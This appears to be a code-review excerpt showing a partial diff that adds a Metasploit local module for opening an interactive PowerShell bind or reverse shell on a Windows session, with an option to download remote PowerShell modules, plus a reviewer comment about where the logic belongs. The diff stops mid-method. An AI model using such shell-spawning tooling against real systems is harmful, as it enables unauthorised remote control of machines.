modules/exploits/windows/local/interactive_powershell.rb

```diff
@@ -0,0 +1,141 @@
+1##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Local
+
+  include Rex::Powershell::Command
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                 => "Windows Local Interactive Powershell Session",
+      'Description'          => %q(
+        This module will start a new interactive PowerShell bind session. A list of
+        modules (comma separated) can be supplied in the LOAD_MODULES option to import
+        into the interactive session. E.g. http://site/p1.ps1,http://site/p2.ps1
+        Use a meterpreter route to ensure you can gain access to the bind port.
+      ),
+      'License'              => MSF_LICENSE,
+      'Platform'             => ['win'],
+      'SessionTypes'         => ['meterpreter'],
+      'DisclosureDate'       => 'Apr 15 2015',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
+      'Payload'        =>
+        {
+          'Compat' =>
+          {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'Arch'          => [ ARCH_CMD ],
+      'Targets'       =>
+        [
+          [ 'Windows', {} ]
+        ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::LPORT(4444),
+        OptString.new('LOAD_MODULES', [false, 'A list of powershell modules seperated by a comma to download over the Internet', nil])
+      ], self.class)
+  end
+
+  def exploit
+    lport = datastore['LPORT']
+
+    if datastore['RHOST'].to_s.empty?
+      rhost = session.session_host
+    else
+      rhost = datastore['RHOST']
+    end
+
+    template_path = File.join(
+      Msf::Config.data_directory,
+      'exploits',
+      'powershell',
+      'powerfun.ps1')
+
+    script_in = File.read(template_path)
+
+    if datastore['LHOST'].to_s.empty?
+      script_in << "\npowerfun -Command bind"
+    else
+      lhost = datastore['LHOST']
+      script_in << "\npowerfun -Command reverse"
+    end
+
+    mods = ''
+
+    if datastore['LOAD_MODULES']
```

Comment:
All of this belongs in the payload classes, this post module should provide the ability to choose bind vs reverse and possibly the port number, like existing post modules that create a new session.